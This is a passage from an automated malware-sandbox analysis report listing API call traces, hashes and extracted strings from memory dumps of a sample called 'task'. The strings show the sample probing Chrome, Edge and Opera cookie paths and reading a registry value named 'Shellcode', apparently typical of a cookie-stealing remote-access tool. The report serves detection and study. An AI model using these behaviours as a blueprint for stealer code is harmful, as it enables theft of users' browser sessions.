                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateInfoMappingSystemView
                                                                                                                                                                • String ID: "$@
                                                                                                                                                                • API String ID: 3466721412-1136454570
                                                                                                                                                                • Opcode ID: c7eb9be680bd7b15f16886ce5a7bdb02d63966e1d1e01109bbf4a03544f02e95
                                                                                                                                                                • Instruction ID: f6544443de3dba9063eda6a24bd67b4fadce33eaa3c0b09af7ee323fa906c042
                                                                                                                                                                • Opcode Fuzzy Hash: c7eb9be680bd7b15f16886ce5a7bdb02d63966e1d1e01109bbf4a03544f02e95
                                                                                                                                                                • Instruction Fuzzy Hash: 30029F7454D384CFD364CF28C194B8EBFE1AF8A308F20895EE9988B395D775A485CB46
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000702C4: SetLastError.KERNEL32(0000000D,00070843,00000000,00000000,00079949), ref: 000702CA
                                                                                                                                                                • SetLastError.KERNEL32(000000C1,00000000,00000000,00079949), ref: 0007085A
                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,00079949), ref: 000708CD
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00070939
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00070940
                                                                                                                                                                • SetLastError.KERNEL32(0000045A), ref: 00070A52
                                                                                                                                                                  • Part of subcall function 000707D7: VirtualFree.KERNEL32(00008000,00000000,00000000,?,00070959,00000000,00000000,00008000,00000000), ref: 000707E3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 486403682-0
                                                                                                                                                                • Opcode ID: a2ff9ba0426b905b03fb3d760af9291ca9d4548826eb5e90d285f4e79ce873b7
                                                                                                                                                                • Instruction ID: 601cff78b8bbf158cfd5993fc0b07d004b951cba52d41da74004999094126541
                                                                                                                                                                • Opcode Fuzzy Hash: a2ff9ba0426b905b03fb3d760af9291ca9d4548826eb5e90d285f4e79ce873b7
                                                                                                                                                                • Instruction Fuzzy Hash: 1B61D171E01601EBEB609F65CD81B6AB7E5BF44300F048358E90C9B682EB7CE951CBD9
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2152742572-0
                                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000001,AC02BBF3,-00000004,0009A897,000A1E3B,AC02BBF3,?,000A0866,00000001,00000001), ref: 000A395D
                                                                                                                                                                • _free.LIBCMT ref: 000A3992
                                                                                                                                                                • _free.LIBCMT ref: 000A39B9
                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000001), ref: 000A39C6
                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000001), ref: 000A39CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountEventTick
                                                                                                                                                                • String ID: h%$h%
                                                                                                                                                                • API String ID: 180926312-1964147555
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C105: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0006C245), ref: 0006C138
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0006C25F
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0006C2CA
                                                                                                                                                                Strings
                                                                                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0006C277
                                                                                                                                                                • User Data\Default\Network\Cookies, xrefs: 0006C245
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                • API String ID: 521105947-1980882731
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C168: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,0006C314), ref: 0006C19B
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0006C32E
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0006C399
                                                                                                                                                                Strings
                                                                                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0006C346
                                                                                                                                                                • User Data\Default\Network\Cookies, xrefs: 0006C314
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                • API String ID: 521105947-1980882731
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocalTime.KERNEL32(00000000,000D2318,000D2568,?,?,?,0007355B,0000003C,00000000,00000000), ref: 0006509B
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,000D2318,000D2568,?,?,?,0007355B,0000003C,00000000,00000000), ref: 000650E7
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000526A,000D2568,00000000,00000000), ref: 000650FA
                                                                                                                                                                Strings
                                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 000650AE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                • API String ID: 2532271599-1507639952
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,000D2318,00000000,Shellcode), ref: 0007199A
                                                                                                                                                                • RegQueryValueExA.KERNEL32(000D2318,00000000,00000000,00000000,?,00000400), ref: 000719B7
                                                                                                                                                                • RegCloseKey.KERNEL32(000D2318), ref: 000719C2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID: Shellcode
                                                                                                                                                                • API String ID: 3677997916-49482680
                                                                                                                                                                APIs
                                                                                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00071B54
                                                                                                                                                                • RegSetValueExA.KERNEL32(?,000C34D0,00000000,?,00000000,00000000,000D22B8,?,?,0006E3B0,000C34D0,4.9.4 Pro), ref: 00071B7C
                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?,0006E3B0,000C34D0,4.9.4 Pro), ref: 00071B87
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                • String ID: pth_unenc
                                                                                                                                                                • API String ID: 1818849710-4028850238
                                                                                                                                                                APIs
                                                                                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,0006E237), ref: 00071C5B
                                                                                                                                                                • RegSetValueExA.KERNEL32(0006E237,?,00000000,00000004,?,00000004,time,?,?,0006CE78,time,?,000D22B8,000D2318,del,del), ref: 00071C76
                                                                                                                                                                • RegCloseKey.KERNEL32(0006E237,?,?,0006CE78,time,?,000D22B8,000D2318,del,del,?,0006E237), ref: 00071C81
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                • String ID: time
                                                                                                                                                                APIs
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,000D1F30), ref: 00064ED8
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,000D1ED8,00000000,00000000), ref: 00064EEB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00064DBE,00000000,00000073,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00064EF6
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00064DBE,00000000,00000073,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00064EFF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FE7D873
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 6FE7D87F
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7D896
                                                                                                                                                                • CloseHandle.KERNEL32(6FE80A90), ref: 6FE7D906
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,0006A3E4), ref: 0007A70C
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,0006A3E4), ref: 0007A720
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,0006A3E4), ref: 0007A745
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0006A3E4), ref: 0007A753
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                • String ID: jo$jo
                                                                                                                                                                APIs
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0006C245), ref: 0006C138
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                APIs
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,0006C314), ref: 0006C19B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                • API String ID: 1174141254-2800177040
                                                                                                                                                                • Opcode ID: 897b1d73a7228d5236d190b49368bc2e0a44d7e0cd477233b83d27384f555314
                                                                                                                                                                • Instruction ID: 4f8d3c6c491db271908cb02fe1c8ff215979cccd5d1d63a8d6728a44d05b7b6e
                                                                                                                                                                • Opcode Fuzzy Hash: 897b1d73a7228d5236d190b49368bc2e0a44d7e0cd477233b83d27384f555314
                                                                                                                                                                • Instruction Fuzzy Hash: 64F08231600215968A04F7E4DC17CFF7B6E9F01710B50012ABA01A61C3EE609E4586E1
                                                                                                                                                                APIs
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0006C3DD), ref: 0006C1FE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                • API String ID: 1174141254-1629609700
                                                                                                                                                                • Opcode ID: 3b8c13f1f7775af36577dfdb6e777c52749688534e58a0ab144fbf647fff7639
                                                                                                                                                                • Instruction ID: 4d389fe61856668dafa55c48480516271ce3c3a2c128cae2fe5f80e9f01cbbb5
                                                                                                                                                                • Opcode Fuzzy Hash: 3b8c13f1f7775af36577dfdb6e777c52749688534e58a0ab144fbf647fff7639
                                                                                                                                                                • Instruction Fuzzy Hash: FFF0A73164021A568A14F7E4DC17DFF7B6DDF00B50B440129BE41635C7DE60DA45C2E1
                                                                                                                                                                APIs
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0006DCE3,00000006,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0006CA5F
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0006CA65
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
